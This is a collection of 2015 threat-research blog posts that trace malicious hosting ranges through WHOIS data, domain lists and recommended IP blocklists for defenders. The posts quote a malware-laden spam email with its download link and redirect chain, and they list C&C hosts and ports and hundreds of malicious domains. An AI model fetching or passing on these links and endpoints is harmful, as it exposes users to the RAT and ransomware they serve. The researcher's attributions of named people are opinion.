Sponsored by..

Showing posts with label Evil Network. Show all posts
Showing posts with label Evil Network. Show all posts

Monday, 21 September 2015

Tainted Network: "kfc.i.illuminationes.com/snitch" and VPS Hosting of Latvia (91.226.32.0/23)

I've been seeing some injection attacks since last week utilising hosting services of VPS Hosting in Latvia. These are continuing today, with attacks like this one [URLquery] which sends traffic to:

[donotclick]kfc.i.illuminationes.com/snitch

This is hosted on 91.226.33.54. The exploit is not clear at this point, but some sources say that this is some sort of TDS kit. The URLquery transaction flowchart shows the attack in action.


The injected script sends the keywords and referring site upstream, for example:

[donotcliick]kfc.i.illuminationes.com/snitch?default_keyword=Team%20Tyra%20%7C%20The%20most%20popular%20equestrian%20website%20in%20Sweden%2FEurope&referrer=&se_referrer=&source=www.teamtyra.se
Although the attacks in the past few days only seem to have utilised 91.226.33.54, an analysis of the netblock [pastebin] shows several bad or spammy sites in 91.226.32.0/23, so my recommendation is that you banish this range from your network.

UPDATE:
ZScaler are also tracking their infection, an analysis of what it does can be found here.

Tuesday, 8 September 2015

Evil network: 89.144.2.0/24 / spoofing Echo Romeo LLP (AS199762)

This post at malware.kiwi caught my eye after a sort-of challenge by Techhelplist. Well, the bottom line is that these get-rich-quick schemes are run by serious organised criminals who tend not to leave too many traces behind.

This appears to be a binary options scam that is using illegally hacked sites as redirectors, and I suspect that it is using a botnet to send the spam in the first place, although this is not clear. Eventually, victims are sent via an affiliate link to a site searchingprofit.me, more of which in another post.

It turns out that dailybusinessdirect.com is hosted alongside a cluster of related domains on a set of IPs apparently belonging to a firm called Echo Romeo LLP in the UK. From the research I have done, it appears that Echo Romeo are a legitimate small business doing web design and hosting. However, they are listed as the owner 89.144.2.0/24 which seems to be almost completely full of spam, scam and malware sites.

UPDATE: there is evidence that Echo Romeo are the victim of a type of corporate identity theft. Scroll to the bottom for me.

Here's an oddity - Echo Romeo have a portfolio on their site of designs they have done for customers. As far as I can tell, none of those customer sites are actually hosted in this IP address range.

The first thing I noticed was a cluster of sites and IPs that appear to be closely related to dailybusinessdirect.com:

89.144.2.85
topinvestmentnews.com
news-finance-today.com

89.144.2.86
profit-method.biz
thesknews.com
huffnewstoday.com
businessnewsclub.com
businessdailygroup.com
investmentnewstoday.com

89.144.2.157
24-finances-news.com
finance-news-cbm.com

89.144.2.158
finances24-news.com
businessinfodaily.com
finance-today-news.com
dailybusinessdirect.com

Some of these domains have anonymous WHOIS details, some have details that look fake. I have not found any way to trace ownership of these domains.. after all, these are not amateurs, these are professional fraudsters who tend not to make silly mistakes.

I checked all the active sites in the 89.144.2.0/24 range against SURBL which came up with these results [csv]. Out of 56 sites identified, 13 are identified by SURBL as being spamming and/or phishing. But what of the rest?

A look at the Google Safe Browsing Diagnostic for AS199762 gave some interesting results:

Safe Browsing

Diagnostic page for AS199762 (ECHOROMEO-AS)

What happened when Google visited sites hosted on this network?
Of the 13 site(s) we tested on this network over the past 90 days, 1 site(s), including, for example, 89.144.2.0/, served content that resulted in malicious software being downloaded and installed without user consent.
The last time Google tested a site on this network was on 2015-09-07, and the last time suspicious content was found was on 2015-08-24.
Has this network hosted sites acting as intermediaries for further malware distribution?
Over the past 90 days, this network has not hosted any sites that appeared to function as intermediaries for the infection of any other sites.
Has this network hosted sites that have distributed malware?
Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 2 site(s), including, for example, t9e.net/, 89.144.2.0/, that infected 7 other site(s), including, for example, kgdbase.com/, kgdbase.eu/, softbase.xyz/.
Drilling down to the Google diagnostic for t9e.net is surprising:

Safe Browsing

Diagnostic page for t9e.net

What is the current listing status for t9e.net?
This site is not currently listed as suspicious.
Part of this site was listed for suspicious activity 150 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 22277 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2015-09-07, and the last time suspicious content was found on this site was on 2015-08-24.Malicious software includes 25596 trojan(s), 61 exploit(s).
This site was hosted on 2 network(s) including AS199762 (ECHOROMEO-AS), AS35042 (ISP4P).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, t9e.net did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 3 domain(s), including kgdbase.com/, kgdbase.eu/, softbase.xyz/.
25,596 trojans and 61 exploits? I think that's a site to avoid, and as you might guess t9e.net has anonymous WHOIS details.

Also in this range:
  • The domains travsolut.com and travsolut.org on 89.144.2.143 are associated with suspect-looking job offers and claim to have been founded in 2002 in Australia, yet the domains were only created in 2015 with the .org being registered to an address in Spain.
  • On 89.144.2.148, the domains weksrubaz.ru, linturefa.ru and xablopefgr.ru are all associated with with the POSeidon malware.  On the same IP, srachechno.com is associated with a later version of the same malware.
  • Meanwhile on 89.144.2.149, dornegromant.com is also associated with POSeidon [pdf]
  • On 89.144.2.150 another POSeidon domain lurks, repherfeted.com.
  • And on 89.144.2.151 there is litramoloka.com which is again POSeidon, as is cawasuse.ru on 89.144.2.152.
  • On 89.144.2.153 is the domain ranferolto.com tagged as Infostealer.Posfind by Symantec. 
  • On 89.144.2.154 the domains gowasstalpa.com and nasedrontit.com are associated with the Pony Downloader
  • On 89.144.2.180 the website clarkgrp.org has been accused of being fake. If that is the case, then marlin-staff.com on the same IP will probably be too.
Overall, the evil-ness factor of 89.144.2.0/24 seems very high indeed (for example, this Damballa report on POSeidon shows how the bad guys moved to this netblock), and yet Echo Romeo LLP seems to be completely legitimate. I even went to the effort of checking them out at Companies House, and all seems OK. I wonder if perhaps the bad guys have either gained control of the IP block or have popped a large number of their servers?

UPDATE:
I asked Echo Romeo about this and their response was very quick..

Echo Romeo had pointed out something that I had missed. The registrant details for the IP block were very similar to their real details..

organisation:   ORG-ERL2-RIPE
org-name:       ECHO ROMEO LLP
org-type:       OTHER
address:        47 GLENMOOR ROAD , WEST PARLEY , FERNDOWN , DORSET , UNITED KINGDOM
admin-c:        JL7999-RIPE
phone:          +44 1202872908
e-mail:         info@echoromeonet.co.uk
abuse-mailbox:  abuse@echoromeonet.co.uk
mnt-ref:        echoromeo-mnt
mnt-by:         echoromeo-mnt
changed:        info@echoromeonet.co.uk 20140128
created:        2014-01-28T17:28:45Z
last-modified:  2014-02-17T12:18:41Z
source:         RIPE


But in fact, their domain name is just echoromeo.co.uk and not echoromeonet.co.uk at all. The WHOIS details for the fake domain are:

Domain name:
        echoromeonet.co.uk

    Registrant:
        ECHO ROMEO LLP

    Registrant type:
        Unknown

    Registrant's address:
        47 GLENMOOR ROAD
        WEST PARLEY
        FERNDOWN
        BH22 8QE
        United Kingdom

    Data validation:
        Nominet was able to match the registrant's name and address against a 3rd party data
source on 25-Jan-2014

    Registrar:
        101Domain, Inc. [Tag = 101INC-US]
        URL: https://101domain.com

    Relevant dates:
        Registered on: 25-Jan-2014
        Expiry date:  25-Jan-2016
        Last updated:  03-Nov-2014

    Registration status:
        Registered until expiry date.

    Name servers:
        ns1.echoromeonet.co.uk    212.38.166.68
        ns2.echoromeonet.co.uk    5.133.179.64

These closely match the real contact details of Echo Romeo. The fake website itself is hosted on 212.38.166.68 (one of the nameservers). It looks very different from the real website.

But all the contact details on the FAKE website point to the REAL Echo Romeo. The whole site looks like a fake created just to get hold of a range of IP address.

Let's go back to these IPs..

The 89.144.2.0/24 range with the fake registration details is carved out of an IP block belonging to isp4p.net (IP Interactive UG, Germany). Presumably the bad guys used the fake Echo Romeo domain and name to persuade IP Interactive to lease them a set of IP addresses.

Although the nameservers of 212.38.166.68 and 5.133.179.64 appear to be on very different blocks, they are actually allocated to the same person:

inetnum:        5.133.179.0 - 5.133.179.255
netname:        IPSERVER
descr:          IPSERVER WORLD LTD
remarks:        abuse-mailbox: abuse@ipserver.su
country:        GB
admin-c:        ON929-RIPE
tech-c:         ON929-RIPE
status:         ASSIGNED PA
mnt-by:         RAPIDSWITCH-MNT
changed:        abuse@rapidswitch.com 20120918
created:        2012-09-18T09:09:38Z
last-modified:  2015-08-12T07:25:02Z
source:         RIPE

person:         Oleg Nikol'skiy
address:        British Virgin Islands, Road Town, Tortola, Drake Chambers
phone:          +18552100465
e-mail:         abuse@ipserver.su
nic-hdl:        ON929-RIPE
mnt-by:         IPSERVER-MNT
changed:        abuse@ipserver.su 20150528
created:        2015-05-28T11:11:09Z
last-modified:  2015-05-28T11:11:09Z
source:         RIPE

route:          5.133.176.0/21
descr:          RapidSwitch
origin:         AS20860
mnt-by:         RAPIDSWITCH-MNT
mnt-routes:     GB10488-RIPE-MNT
changed:        richard@iomart.com 20120712
created:        2012-07-12T15:08:31Z
last-modified:  2012-07-12T15:08:31Z
source:         RIPE


Both have been leased from Iomart in the UK. .SU domains such as ipserver.su are such a strong indicator of badness that I even have a little graphic for them.

A quick look at the 5.133.179.0/24 and 212.38.166.0/24 ranges indicates they are full of crap. There may be legitimate sites hosted there, but I would recommend blocking them.

The evidence that I can find does seem to point toward this spoof IP range being set up by organised criminals in Russia, and my opinion is that Echo Romeo LLP have nothing to do with this at all and are the good guys.

Recommended blocklist:
89.144.2.0/24
5.133.179.0/24
212.38.166.0/24

Monday, 7 September 2015

Something evil on 184.105.163.192/26 / White Falcon Communications / Dmitry Glazyrin

So.. I spotted some Nuclear EK (or some other Flash exploit) traffic on our network which attracted my interest. The IP in question was 184.105.163.243 hosted on what appears to be a Hurricane Electric IP. Personally, I don't tend to see a lot of bad stuff on HE so I looked more closely at the IP WHOIS and saw it was part of a range 184.105.163.192/26 suballocated to:

contact:ID;I:POC-DC-1258
contact:Auth-Area:contacts
contact:Class-Name:contact
contact:Name:Dmitry Glazyrin
contact:Company:White Falcon Communications
contact:Street-Address:3-758 Riverside Dr
contact:City:Port Coquitlam
contact:Province:BC
contact:Postal-Code:V3B 7V8
contact:Country-Code:CA
contact:Phone:+1-510-580-4100


The next step was to query the range using DNSDB to see what has been hosted there. This came back with several thousand sites that have been hosted there in the past, the following of which are still hosted in the 184.105.163.192/26 range now..

bilettver.ru
ituslugi-ekb.ru
kerept.ru
porno-gt.com
pornosup.com
redkrab.com
vgubki.com
erotubik.com
autowagen.ru
decoitalcolor.ru
jimbobox.ru
kr-enot.ru
alemanas.ru
dynamo-energia.ru
master-lesa.ru
kinoprosmotra.net
multi-torrent.com
pl-games.ru
voyeur-hard.com
fishemania.com
learnigo.ru
qazashki.net
surfus.ru
mysuppadomainname.gq
kinoprosmotrov.net
multtracker.com
kyricabgr.tk
onlyhdporno.com
stat-irc.tk
white-wolves.tk
blondescript.com
dc-dcbcf352.hotvideocentral.com
wishfishworld.com
5ka.info
igro-baza1.ru
igro-baza2.ru
igro-baza3.ru
igro-baza4.ru
igro-baza5.ru
kinorelizov.net
torrent-mult.com
trailer-games.ru
vvpvv10.ru
vvpvv9.ru
todoke.ru
glazikvovana.cf
glazikvovana.ga
glazikvovana.gq
glazikvovana.ml
glazikvovana.tk
glazikvovki.cf
glazikvovki.ga
glazikvovki.gq
glazikvovki.ml
glazikvovki.tk
popochkavovana.cf
popochkavovana.ga
popochkavovana.gq
popochkavovana.ml
popochkavovana.tk
popochkavovki.cf
popochkavovki.ga
popochkavovki.gq
popochkavovki.ml
popochkavovki.tk
resnichkavovana.cf
resnichkavovana.ga
resnichkavovana.gq
resnichkavovana.ml
resnichkavovana.tk
resnichkavovki.cf
resnichkavovki.ga
resnichkavovki.gq
resnichkavovki.ml
resnichkavovki.tk
samaragss.ru
wechkavovana.cf
wechkavovana.ga
wechkavovana.gq
wechkavovana.ml
wechkavovana.tk
wechkavovki.cf
wechkavovki.ga
wechkavovki.gq
wechkavovki.ml
wechkavovki.tk
zalypkavovana.ml
zalypkavovana.tk

zalypkavovki.cf
zalypkavovki.ga
zalypkavovki.gq
zalypkavovki.ml
zalypkavovki.tk
zybikvovana.cf
zybikvovana.ga
zybikvovana.gq
zybikvovana.ml
zybikvovana.tk
zybikvovki.cf
zybikvovki.ga
zybikvovki.gq
zybikvovki.ml
zybikvovki.tk
staffrc.com
stopudof.com
35igr.ru
adandc.ru
avgyst.ru
comedy24.ru
e7ya.ru
funrussia.ru
ladykafe.ru
med-cafe.ru
mykazantip.ru
ohotaforum.ru
powerpoint-ppt.ru
sibledy.ru
turistvip.ru
ya-pisatel.ru
kypitest.ru
anykadavai.tk
forwarditaly.org
getyourimesh.com
mymobi.ml
yellowfrance.org

Sites that are flagged as malware by Google are highlighted and these are all hosted on 184.105.163.243. But what was interesting was what White Falcon Communications have been hosting in the past. When I ran the entirety of all the sites from DNSDB through my checker, I got some interesting results* [csv].

Out of 2867 sites analysed, 1973 (69%) sites had either hosted malware or were spammy. Some of the unrated sites are clearly phishing sites (e.g. usabanksecurity.com). Although these sites are not hosted on White Falcon Communications IPs now, they all have been at some point in the past.

So, who is this outfit? Well, it didn't take to come up with a couple of news stories, firstly this one where White Falcon had been raided by police in Canada in connection with C2 infrastructure for the Citadel botnet. That was followed by this story where White Falcon was allegedly suing law enforcement back, due to alleged "negligence".

However, given the sheer volume of crap that White Falcon has hosted in the past and its current problem with exploit kits, I would definitely recommend blocking traffic to 184.105.163.192/26 to be on the safe side.

* fields are domain name, current IP address, MyWOT ratings, Google Safebrowsing rating, SURBL status.

Friday, 24 July 2015

Evil network: Malicious RATs (including milano.exe) on 185.19.85.128/26 (Datawire AG)

There's more to this spam than meets the eye:

From:    wholesale.uganda@anisuma.com
To:    "tariq@paramountdistributors.com" [wholesale.uganda@anisuma.com]
Date:    24 July 2015 at 13:31
Subject:    re:invoice

Attention
Please confirm your consignee name and address on the BL
http://a.pomf.se/cvpkgu.rar
please let update me
thanks 
"Anisuma Traders" is the name of a legitimate trading corporation with operations in several African countries, although they are not sending the spam. It looks like a phish, right? Wrong..

The apparent link to a .rar file caught my eye. In fact, the download location is not pomf.se (a defunct Swedish site) but the click chain goes like this:

http://ge.tt/api/1/files/1XjW10L2/0/blob?download
http://api.ge.tt/1/files/1XjW10L2/0/blob?download
http://ec2-54-155-123-115.eu-west-1.compute.amazonaws.com:9009/streams/1XjW10L2/stu.rar?sig=-U7AIHwQKNyk4BP6A2uOe9UYEFBYCm3SADo&type=download

The file downloaded is stu.rar which in turn contains an executable milano.exe. I'm going to take a guess and suggest that this is a Very Bad File, although the VirusTotal report give a detection rate of just 1/55 with McAfee flagging it as "BehavesLike.Win32.BackdoorNJRat.gc"

Both the Malwr and Hybrid Analysis reports show that it hooks into the OS and attempts to avoid detection. Crucially, they both show network traffic to gee.duia.eu on 185.19.85.138 (Datawire, Switzerland).

So, McAfee thinks this is a RAT and there's suspect network traffic, but what do the email headers tell us?
Received: from mail.anisuma.com (mail.jackys.com [83.111.201.118])
    (using TLSv1 with cipher AES128-SHA (128/128 bits))
    (No client certificate requested)
    by [redacted] (Postfix) with ESMTPS id A8CE2AF548
    for [redacted]; Fri, 24 Jul 2015 12:32:29 +0000 (UTC)
Received: from [10.85.138.34] by mail.jackys.com (Cipher TLSv1:-SHA:128) (MDaemon PRO v12.5.3)
    with ESMTP id md50009556350.msg
    for [redacted]; Fri, 24 Jul 2015 16:33:59 +0400
X-Spam-Processed: mail.jackys.com, Fri, 24 Jul 2015 16:33:59 +0400
    (not processed: message from trusted or authenticated source)
X-MDRemoteIP: 185.19.85.138
X-Return-Path: prvs=164718a849=wholesale.uganda@anisuma.com
X-Envelope-From: wholesale.uganda@anisuma.com
X-MDaemon-Deliver-To: [redacted]
Content-Type: multipart/alternative; boundary="===============0415218432=="
MIME-Version: 1.0
Subject: re:invoice
To: "tariq@paramountdistributors.com" <wholesale.uganda@anisuma.com>
From: wholesale.uganda@anisuma.com
Date: Fri, 24 Jul 2015 13:31:09 +0100
The "X-MDRemoteIP" header shows that the email originates from the same server it is phoning home to. This is unusual because most spam these days come from botnets, and if the originating server gets shut down for spam then the infected clients won't be able to phone home. The email routes through servers belong to jackys.com in the UAE, perhaps indicating that someone has altered their systems to allow the malicious traffic to route through.

185.19.85.138 is therefore a server of interest, but a quick look at the IP and the neighbourhood indicate that this isn't just a single popped server.. there are 58 IPs hosting what appears to be malicious data (listed at the end) taking up the entire 185.19.85.128/26 range.

I'm betting that renting a /26 slice of Swiss servers isn't cheap.

Out of all the malicious domains (listed at the end of the post), one stands out boss.milano22.com (because the binary is named milano.exe). That is related to this malware, but the WHOIS details reveal no clues.

Another one that also caught my eye because it is multihomed on so many IPs is zexio.no-ip.biz which is related to this malware from 2012 which is variously identified as Shakblades and/or Blackshades, both illicit RAT tools.

Looking at various other domains shows that they are connected with other malicious activity over the past two years or so. What that means is that this operation is not only big, but has been going on for some time.

For research purposes, a copy of the malware is here (Zip file, password=infected)

Personally, I would recommend that you block all dynamic DNS domains on a corporate network, and combined with the other potentially malicious domains gives the following recommended blocklist:

185.19.85.128/26
a5b4c3d2e1.com
3utilities.com
blogsyte.com
brasilia.me
chickenkiller.com
craftx.biz
ddns.me
ddns.net
dnsiskinky.com
duia.eu
dvrcam.info
eating-organic.net
game-server.cc
game-host.org
geekgalaxy.com
gotdns.com
homeip.net
isa-geek.net
glory297.org
hopto.org
linkpc.net
milano22.com
minecraftnoob.com
mlbfan.org
no-ip.biz
no-ip.info
no-ip.org
noip.me
noip.us
redirectme.net
serveblog.net
serveftp.com
sytes.net
zapto.org
zicoyanky.pw

Malicious IPs:
185.19.85.133
185.19.85.134
185.19.85.135
185.19.85.136
185.19.85.137
185.19.85.138
185.19.85.139
185.19.85.140
185.19.85.141
185.19.85.142
185.19.85.143
185.19.85.144
185.19.85.145
185.19.85.146
185.19.85.147
185.19.85.148
185.19.85.149
185.19.85.150
185.19.85.151
185.19.85.152
185.19.85.153
185.19.85.154
185.19.85.155
185.19.85.156
185.19.85.157
185.19.85.158
185.19.85.159
185.19.85.160
185.19.85.161
185.19.85.162
185.19.85.163
185.19.85.164
185.19.85.165
185.19.85.166
185.19.85.167
185.19.85.168
185.19.85.169
185.19.85.170
185.19.85.171
185.19.85.172
185.19.85.173
185.19.85.174
185.19.85.175
185.19.85.176
185.19.85.177
185.19.85.178
185.19.85.179
185.19.85.180
185.19.85.181
185.19.85.182
185.19.85.183
185.19.85.184
185.19.85.185
185.19.85.186
185.19.85.187
185.19.85.188
185.19.85.189
185.19.85.190

Malicious domains:
fort.ugo10.minecraftnoob.com
mtxcg.craftx.biz
6306921.no-ip.biz
1mathieucg.no-ip.biz
artengo.no-ip.biz
asawakath.no-ip.biz
asrxxx.no-ip.biz
bluemountain55.no-ip.biz
bluntmosphere.no-ip.biz
businessdb04.no-ip.biz
charssi693.no-ip.biz
chobitsshocks.no-ip.biz
daniel123k.no-ip.biz
debug.no-ip.biz
divin32.no-ip.biz
donkriss101.no-ip.biz
draynet1.no-ip.biz
fatal889321.no-ip.biz
freebandz.no-ip.biz
freeyou2014.no-ip.biz
gptman5.no-ip.biz
gptmanster5.no-ip.biz
ian1954.no-ip.biz
icediamant.no-ip.biz
ikemello.no-ip.biz
infosearch898.no-ip.biz
itisnotreal.no-ip.biz
jskvikel.no-ip.biz
kobsrat.no-ip.biz
lizzykane.no-ip.biz
lolwot.no-ip.biz
maicol.no-ip.biz
michael8776.no-ip.biz
miker790.no-ip.biz
milano22.no-ip.biz
mortexmutex.no-ip.biz
natilexx.no-ip.biz
nonysa.no-ip.biz
oezeokobe1.no-ip.biz
oneprouddad.no-ip.biz
rumberocalle.no-ip.biz
serenity786.no-ip.biz
sm3351.no-ip.biz
sslcertificates.no-ip.biz
stroperjilles.no-ip.biz
update28459.no-ip.biz
uzolion.no-ip.biz
windowsupdate995.no-ip.biz
wizard2002.no-ip.biz
wowyougotme.no-ip.biz
wuwksterboss.no-ip.biz
zexio.no-ip.biz
new.game-server.cc
nnicrosoft.3utilities.com
obinnabio.blogsyte.com
joeban.chickenkiller.com
ceedata.dnsiskinky.com
bio4kobs.geekgalaxy.com
kan3.gotdns.com
boss.milano22.com
microsoftcorp.serveftp.com
shadybiodata.dvrcam.info
izimother.no-ip.info
lopta10.no-ip.info
nzvat.no-ip.info
test13.no-ip.info
biodataczar.brasilia.me
streetdesciple.ddns.me
austinrat.noip.me
marct2702.noip.me
bigtoby35.ddns.net
businessdb00.ddns.net
layziebone009.ddns.net
mikey0147.ddns.net
cagbbio.eating-organic.net
new.homeip.net
pcuser.homeip.net
updated.homeip.net
spynet.homelinux.net
microdude.isa-geek.net
akconsult.linkpc.net
enitan.linkpc.net
server23.redirectme.net
serialcheck55.serveblog.net
obasanjo.sytes.net
sadsix.sytes.net
window.sytes.net
internet.game-host.org
coza.glory297.org
makingpay.hopto.org
tudorsdetails.mlbfan.org
ayool.no-ip.org
ayool1.no-ip.org
ayool2.no-ip.org
beastyyou.no-ip.org
business11.no-ip.org
chuks052.no-ip.org
cryptoesel.no-ip.org
dextercom.no-ip.org
divin32.no-ip.org
doingit108.no-ip.org
fazbar2013.no-ip.org
frankspecht.no-ip.org
immo506.no-ip.org
immo886.no-ip.org
jackro.no-ip.org
lizzykane.no-ip.org
micheal4fingax-07.no-ip.org
milano99.no-ip.org
morechedder.no-ip.org
mywaylife.no-ip.org
orangeroom.no-ip.org
papakamsi4moni7.no-ip.org
spongebob30.no-ip.org
ukon.no-ip.org
win7test.no-ip.org
zenithsales.no-ip.org
0tazbox.zapto.org
bellwiz2.zapto.org
bluemountain.zapto.org
bluemountain66.zapto.org
client.zapto.org
hessu.zapto.org
hessubs.zapto.org
izilife.zapto.org
sadsix.zapto.org
tazbox.zapto.org
tinubu.zapto.org
win7test.zapto.org
x631.zapto.org
xecuter.zapto.org
xecuter2.zapto.org
www.zicoyanky.pw
twitch.noip.us
a5b4c3d2e1.com
gee.duia.eu

Friday, 20 March 2015

Something evil on 85.143.216.102 and 94.242.205.101

I will confess that I don't have much information on what this apparent exploit kit is or how it works, but there seems to be something evil on 94.242.205.101 (root SA, Luxembourg) [VT report] being reached via 85.143.216.102 (AirISP, Russia) [VT report].

Whatever it is, it is using subdomains from hijacked GoDaddy accounts [1] [2] which is a clear sign of badness. The hijacked GoDaddy domains change very quickly, but these have all been used in the past day or so on both those IPs:

dchsleep.com
manymike.com
vladeasa.com
ezdockparts.com
suurtampere.com
visikreatif.com
josemiguelez.com
reformapenal.com
axwaydropzone.com
capitolskopje.com
theantennapub.com
faceofsustengo.com
niagarajournal.com
crystalbeachhill.com
ezdockadirondacks.com
ezdockfingerlakes.com
chambel.info
lidifaria.info
ewwebinars.co
cybercoaching.co
ewwebinars.com
eyouthcounseling.com
ecounselingnation.com
epastoralcounseling.com
extraordinaryfamilies.com
drtim.net
drclinton.net
ewomencast.net
ecounseling.net
drtimclinton.net
ecouplecounseling.net
biblicalcoachingtoday.net
drclinton.org

For practical purposes though I recommend you block traffic to the IPs rather than the domains.

Recommended blocklist:
85.143.216.102
94.242.205.101

UPDATE:
These following nearby IPs have also been distributing badness. I recommend you block these too:
85.143.216.103
94.242.205.98

Tuesday, 17 February 2015

Something evil on 92.63.88.0/24 (MWTV, Latvia)

I've been tracking Dridex for some time, and I keep seeing IPs for MWTV in Latvia cropping up. So far I have seen:

92.63.88.87
92.63.88.97
92.63.88.100
92.63.88.105
92.63.88.106
92.63.88.108

I'm not sure how widely this spreads through the MWTV network, but I would certainly recommend blocking 92.63.88.0/24 on your network perimeter.

Friday, 13 February 2015

Something evil on 95.163.121.0/24 (Digital Network JSC / com4tel.ru / cloudavt.com)

I've written about DINETHOSTING aka Digital Network JSC many times before, and frankly their entire IP range is a sea of crap, and I have a whole load of blocks in the 95.163.64.0/18 range (including the entirity of 95.163.64.0/10). This latest sea of badness seems to be suballocated to a customer using the 95.163.121.0/24 block.

inetnum:        95.163.121.0 - 95.163.121.255
netname:        RU-CLOUDAVT-NET
descr:          LLC ABT Cloud Network
country:        RU
admin-c:        PPP9992-RIPE
tech-c:         PPP9992-RIPE
status:         ASSIGNED PA
mnt-by:         DN-MNT
changed:        ncc@msm.ru 20150213
source:         RIPE

person:         Andrey Tkachenko
address:        107589, Russia Moscow street Khabarovsk 4A
e-mail:         cc-it@com4tel.ru
phone:          +7 916 626 7798
fax-no:         +7 916 626 7798
nic-hdl:        PPP9992-RIPE
abuse-mailbox:  info@cloudavt.com
mnt-by:         DN-MNT
changed:        noc@msm.ru 20140429
source:         RIPE

route:          95.163.64.0/18
descr:          Digital Network JSC
descr:          Moscow, Russia
descr:          http://www.msm.ru
descr:          aggregate prefix
origin:         AS12695
mnt-by:         DN-MNT
changed:        noc@msm.ru 20121129
source:         RIPE
Tools


Just looking at blog posts, I can see badness occurring in the recent past on the following IPs:
95.163.121.71 [1]
95.163.121.72 [2]
95.163.121.188 [3]
95.163.121.216 [4]
95.163.121.217 [5]

That's quite a high concentration of bad servers in a relatively small block. A quick look at what is currently hosted indicates (in my personal opinion) nothing of value, and I would recommend blocking the entire 95.163.121.0/24 range as a precaution.

Friday, 6 February 2015

Something evil on 5.196.143.0/28 and 5.196.141.24/29 (verelox.com)

This quite interesting blog post from Cyphort got me digging into that part of the infection chain using nonsense .eu domains. It uncovered a whole series of IPs and domains that have been used to spread Cryptowall (possibly other malware too), hosted in the 5.196.143.0/28 and 5.196.141.24/29 ranges (and possibly more).

These are OVH IP ranges, suballocated to a customer called Verelox.com. I think that Verelox is a legitimate but very small web host that has suffered a major compromise of their servers.

The first range is 5.196.141.24/29 which has apparently compromised servers at:
 
5.196.141.24
5.196.141.25
5.196.141.26
5.196.141.27

..you can see a dump of probably evil domains in this pastebin. The second range is 5.196.143.0/28 with apparently compromised servers at:

5.196.143.3
5.196.143.4
5.196.143.5
5.196.143.6
5.196.143.7
5.196.143.8
5.196.143.10
5.196.143.11
5.196.143.12
5.196.143.13

..you can see a list of those domains in this pastebin

Registration details of the domains vary, including some that use the somewhat amusing email address reach4keys@gmail.com. Some of the .eu domains and the .xyz domains have contact details as follows:

Registrant ID: INTE54fjkzffmcv1
Registrant Name: Ramil Jamaletdinov
Registrant Organization:
Registrant Street: Bolshaya str, 15, kv.12
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 105553
Registrant Country: RU
Registrant Phone: +7.90988766754
Registrant Phone Ext:
Registrant Fax: +7.
Registrant Fax Ext:
Registrant Email: jramil889@gmail.com


I don't know if this person actually exists or indeed has anything to do with this, all searches come up blank.

In addition to this, some of these domains use nameservers on the following IP addresses:

168.235.70.106
168.235.69.219


These are allocated to Ramnode LLC in the US. I would suggest that they are under the control of the bad guys and are worth blocking traffic to.

Note that Cyphort identift these C&C servers for the malware:
asthalproperties.com:4444
pratikconsultancy.com:8080

The following IPs and domain names all seem to be connected and I would recommend blocking at least the IP addresses and domains in bold (the other domains look like they are probably throwaway ones):

5.196.143.0/28
5.196.141.24/29
168.235.69.219
168.235.70.106

asthalproperties.com
pratikconsultancy.com

2hk7.eu
8m3a.eu
aaawq1.eu
aaawq2.eu
aaawq3.eu
asoooe1.eu
asoooe2.eu
asoooe3.eu
asw1.eu
asw2.eu
asw3.eu
bilipa.eu
bimbino.eu
bindarov.eu
c4c7.eu
cemtro3.eu
demotikvk.eu
dnor1.eu
dnor2.eu
dnor3.eu
efrai1.eu
efrai2.eu
fesvom.eu
fliston.eu
g19f.eu
gerww3.eu
giuyt5.eu
giuyt6.eu
grannu1.eu
gremn2.eu
gremn3.eu
gyyf.eu
happer1.eu
happer2.eu
happer3.eu
happer4.eu
happer5.eu
happer6.eu
hewoq5.eu
hewoq6.eu
hrt1.eu
hrt2.eu
huayolo.eu
joybul.eu
kalinda.eu
manike.eu
nicjaa5.eu
nicjaa6.eu
ponrel.eu
sindy5.eu
slanecom.eu
slawq2.eu
solonecem.eu
timona.eu
volosq.eu
vvyyyx.eu
kreni.xyz
slanecom.xyz
solonecem.xyz



Thursday, 8 January 2015

Persistent hijacked GoDaddy domains serve malware via Turkish IPs

Last year I wrote about a small bunch of IPs belonging to Radore Veri Merkezi Hizmetleri A.S in Turkey that seemed to be aggressively pushing an exploit kit via hijacked GoDaddy domains. Today I was slightly surprised to see that this is still going on, and in some cases using the same domains as they were all those months ago.

Let's start by looking at an example hijacked domain gssportspics.com which is a neat little site with some high school photos of sports and events on.


We can look up the DNS details for www.gssportspics.com and they look OK with an IP of 184.168.152.5 which belongs to GoDaddy.

01/08/15 14:06:28 dns www.gssportspics.com
Mail for www.gssportspics.com is handled by smtp.secureserver.net mailstore1.secureserver.net
Canonical name: gssportspics.com
Aliases:
  www.gssportspics.com
Addresses:
  184.168.152.5


The domain is registered by GoDaddy, the domain is hosted by GoDaddy. Makes sense, and the website is clean of malware as far as I can tell.

But the problem is that there are a whole bunch of subdomains also using the gssportspics.com that you can't easily tell are there. For example, these subdomains all exist too:

invu.gssportspics.com
yossi.gssportspics.com
auckle.gssportspics.com
sively.gssportspics.com
truset.gssportspics.com
vishal.gssportspics.com
sovieana.gssportspics.com
wiramart.gssportspics.com
gardenhour.gssportspics.com
spechtling.gssportspics.com

Let's look up one of these..

01/08/15 14:24:45 dns vishal.gssportspics.com
Canonical name: vishal.gssportspics.com
Addresses:
  31.210.96.158


Well, that IP address ain't GoDaddy.

inetnum:        31.210.64.0 - 31.210.127.255
netname:        TR-RADORE-20110504
descr:          Radore Veri Merkezi Hizmetleri A.S.
country:        TR
org:            ORG-RHTH1-RIPE
admin-c:        RLA11-RIPE
tech-c:         RLA11-RIPE
status:         ALLOCATED PA
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      RADORE-MNT
mnt-routes:     RADORE-MNT
mnt-domains:    RADORE-MNT
notify:         registry@rh.com.tr
changed:        hostmaster@ripe.net 20110504
changed:        hostmaster@ripe.net 20130410
changed:        bit-bucket@ripe.net 20130930
source:         RIPE


Well, we've been here before and I can tell you that these sort of hijacked sites are hosted on the following IPs:

31.210.96.155
31.210.96.156
31.210.96.157
31.210.96.158


